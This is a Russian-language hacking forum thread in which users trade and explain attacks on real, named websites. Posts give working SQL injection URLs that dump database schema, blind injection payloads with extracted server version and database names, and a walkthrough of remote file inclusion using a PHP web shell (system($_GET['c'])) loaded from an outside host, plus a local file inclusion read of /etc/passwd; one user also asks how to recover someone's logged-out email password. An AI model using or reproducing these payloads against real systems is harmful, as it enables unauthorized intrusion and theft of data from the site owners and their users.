Вопросы по уязвимостям — HackZona.Ru

Здесь задаем вопросы по найденым уязвимостям, и ждем(!!!) ответа. Никакого флейма, никаких просьб о взломе! Оставляю за собой право удалять посты без объяснения причины, и не надо по этому поводу писать мне в личку, она все равно заполнена на 100%)

Вопросы по уязвимостям

Сообщений в теме: 381
abdullla
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
2agata там все просто обычная скуля
[code]
www.wwf.ru/about/people/tab63/?oid.in=-240)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
[/code]

2all а как быть с етой

[code]
sexlite.ru/index/ssssssss
[/code]

вот тут SELECT-ами и LIMIT-ами запахло

[code]
sexlite.ru/cat/36/page/fff
[/code]
но провести INJ не смог
11:58 Ответить
seadon
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Скажите можно ли как то, откуда то вытащить пароль, который вводился для електронной почты, но потом была нажата кнопка «Выход»?
Браузер — опера
Почтовый сервис — яндекс
Спасибо
23:18 Ответить
scipio - автор темы
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
2agata
http://www.wwf.ru/about/people/tab63/?oid.in=240)+and+1=2+union+select+1,concat(table_schema,0x2e,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+--+

Имхо не только это, но и этого достаточно
05:49 Ответить
scipio - автор темы
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
2abdullla
«инъекция» в лимит, имхо ничего
2Shta1ne_
">
читай про XSS
05:34 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[url]http://www.teletesting.ru/z/obr.php[/url]

Сервер запросил неподдерживаемый метод аутентификации имени пользователя.

Какие методы вообще существуют? и вообще что он тупит, разьясните…
13:31 Ответить
scipio - автор темы
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=Kerny;87969][url]http://www.teletesting.ru/z/obr.php[/url]

Сервер запросил неподдерживаемый метод аутентификации имени пользователя.

Какие методы вообще существуют? и вообще что он тупит, разьясните...[/QUOTE]
Зайди не оперой а например ФФ или ослом, а вообще там бейсик авторизация
14:29 Ответить
RazArt
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[URL=«forum.hackzona.ru/../../member.php?u=145071»][COLOR=green]fraIzer[/COLOR][/URL], объясни нубу про эти инекции, в той статье что дал было:

[QUOTE]
Возьмем такой фрагмент кода
Код:
[LEFT]$umol4anie=«main.php»;
if(@$_GET['id'])
include($_GET['id']);
else
include($umolchanie);[/LEFT]

URL в таком случае имеет вид [COLOR=Lime]http://site.ru/index.php?id=module.php[/COLOR]. Часто (почти всегда), если этого не запрещает конфигурация PHP, мы можем вставить в тело скрипта свой фрагмент, подменив адрес к include'аемому скрипту[/QUOTE]

Но юзеру же посылаеться хтмл, как там чёто менять и тд. (сори а нубство, первый раз хаками занимаюсь :)
21:22 Ответить
Gerceg
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
где можно подробно прочитать о php include киньте плиз урлу в ПМ и не надо говорит о гугле
21:00 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=Gerceg;88516]где можно подробно прочитать о php include киньте плиз урлу в ПМ и не надо говорит о гугле[/QUOTE]

Ты как всегда в своём репертуаре :( лови [url=http://forum.antichat.ru/threadnav23501-1-10.html]линк[/url]
21:08 Ответить
svert
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Если я правильно понял вопрос.
[url]http://site.ru/index.php?id=http://yoursite.name/yourscript.txt[/url] — вот эта строка будет выполнена как родная:)
22:51 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Ну это если прокатит удалённый инклюд. Если нет, то где-то так:
[COLOR=Lime]http://site.ru/index.php?id=/etc/passwd
[/COLOR]
11:07 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=RazArt;88519][URL=«forum.hackzona.ru/../../member.php?u=145071»][COLOR=green]fraIzer[/COLOR][/URL], объясни нубу про эти инекции, в той статье что дал было:
[QUOTE]
Возьмем такой фрагмент кода
Код:
$umol4anie=«main.php»;
if(@$_GET['id'])
include($_GET['id']);
else
include($umolchanie);

URL в таком случае имеет вид [url]http://site.ru/index.php?id=module.php[/url]. Часто (почти всегда), если этого не запрещает конфигурация PHP, мы можем вставить в тело скрипта свой фрагмент, подменив адрес к include'аемому скрипту[/QUOTE]

Но юзеру же посылаеться хтмл, как там чёто менять и тд. (сори а нубство, первый раз хаками занимаюсь :)[/QUOTE]
[QUOTE=-JC-]
Ну это если прокатит удалённый инклюд. Если нет, то где-то так:
[code]
site.ru/index.php?id=/etc/passwd[/code] [/QUOTE]
Жек ты не понял, дан конкретный пример с вырезкой из кода…
RazArt, тут дело в том, что переменная [U]id[/U] передаваемая гетом не проверяется, а сразу инклудится, что даёт нам возможность инклюднуть удалённый файл с другого сайтенга, -JC- тут возможен удалённый инклуд, так как значение передаваемое переменной даже не проверяется на наличие на сервере при помощи ф-ции file_exists, но даже эта проверка не панацея… RazArt, если возникнут вопросы по статье задавай, но прежде попробуй сам разобраться…
11:45 Ответить
RazArt
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[URL=«forum.hackzona.ru/../../member.php?u=145071»][URL=«forum.hackzona.ru/../../member.php?u=145071»]fraIzer[/URL][/URL] это ты не понял, я знаю то функции передаёться ссыль на пхп, я не понял как её передать)
22:13 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=RazArt;88665][URL=«forum.hackzona.ru/../../member.php?u=145071»][URL=«forum.hackzona.ru/../../member.php?u=145071»]fraIzer[/URL][/URL] это ты не понял, я знаю то функции передаёться ссыль на пхп, я не понял как её передать)[/QUOTE]
Никакой ссыль на пхп она не передаёт! Блин задавай вопросы по человечески… :evil:
[CODE]http://site.ru/index.php?[B][COLOR=«Blue»]id[/COLOR][/B]=http://othersite.ru/[COLOR=«Red»][B]anyfile[/B][/COLOR][/CODE]
Где содержимое [COLOR="#ff0000"][B]anyfile[/B][/COLOR] — это неинтерпретированный на othersite.ru PHP-скрипт. Например вот такой:
[CODE]<?
system($_GET['c']);
?>[/CODE]
Таким образом мы получим веб-шелл. А выполнять команды сможем примерно так:
[CODE]http://site.ru/index.php?id=http://othersite.ru/anyfile&c;=[COMMAND][/CODE]
08:10 Ответить
RazArt
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
А всё понял, биг спс, щас буду пробовать)
12:10 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=Kerny;90272][url]http://fenu.ru/?a=page&id;=999[/url]

когда такого значения не существует, выплевывает ошибку…

[B]Bad query! select utype from content_eng where id=[/B]

Можно как-нибудь использовать?[/QUOTE]
Нет…
16:55 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
Чет не катит…
[CODE]http://www.jewelofsantafe.com/productsByCategory.asp?strSubCatalogID=1&curCatalogID;=10009+or+1=@@version;&strSubCatalog;_NAME=0[/CODE]

Зато можно перебираться по каталогам, и попытаться проверить есть ли такой файл на сервере:

[CODE]http://www.jewelofsantafe.com/productsByCategory.asp?strSubCatalogID=0&curCatalogID;=10009+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+..\..\..\file.txt.TABLES);&strSubCatalog;_NAME=[/CODE]

разъясните пожалуйста…
12:17 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[B]Kerny[/B], собственно говоря в чём вопрос? И на будущее, просьба, заключайте линки в теги [U]code[/U]…
13:40 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
откуда взялась возможность проверять есть ли такой файл на сервере, и я не могу дальше расрутить…
14:15 Ответить
Welemir
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
home.fill.ee/~vasja/popup.php?Active=2&ID;=11824{Скуля}

Ни один из методов, испробованных мной, не работает.
20:19 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
Ошибка вида:
[CODE]The used SELECT statements have a different number of columns in /home/vasja/public_html/functions.php on line 1420[/CODE]
говорит о том, что данные переходят из одного запроса в другой с иным кол-вом полей! Кстати их 5… запрос к БД выглядит следующим образом:
[CODE]SELECT pml_movieprop.Property,
pml_movies.ID AS MovieID,
pml_prop.ID AS PropID
FROM pml_movies,pml_movieprop,pml_prop
WHERE pml_movieprop.MovieID=pml_movies.ID
AND pml_movieprop.PropID=pml_prop.ID
AND NOT (pml_prop.PropType=2 OR pml_prop.PropType=3 OR pml_prop.PropType=4)
AND pml_movies.ID=11824 union select 1,2,3,4,5 --[/CODE]
По сути класическая инъекция в where…
20:57 Ответить
Welemir
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Это я и сам понял.А ты попробуй что-нибудь *взять*
22:34 Ответить
laedafess
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://home.fill.ee/~vasja/popup.php?Active=2&ID;=11824+and+1=if(substring(version(),1,1)=5,(select+1+union+select+2),0)+--

http://home.fill.ee/~vasja/popup.php?Active=2&ID;=11824+and+1=if(ascii(lower(substring(version(),1,1)))=53,(select+1+union+select+2),0)+--

version(): [B]5.0.51a-12-log[/B]
user(): [B][email protected][/B]
database(): [B]deadhead_db2[/B]
00:52 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=Welemir;89247]Это я и сам понял.А ты попробуй что-нибудь *взять*[/QUOTE]
Попробовал *взял*…
05:47 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[url]http://fenu.ru/?a=page&id;=999[/url]

когда такого значения не существует, выплевывает ошибку…

[B]Bad query! select utype from content_eng where id=[/B]

Можно как-нибудь использовать?
15:22 Ответить
Ответить
1 3 4
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.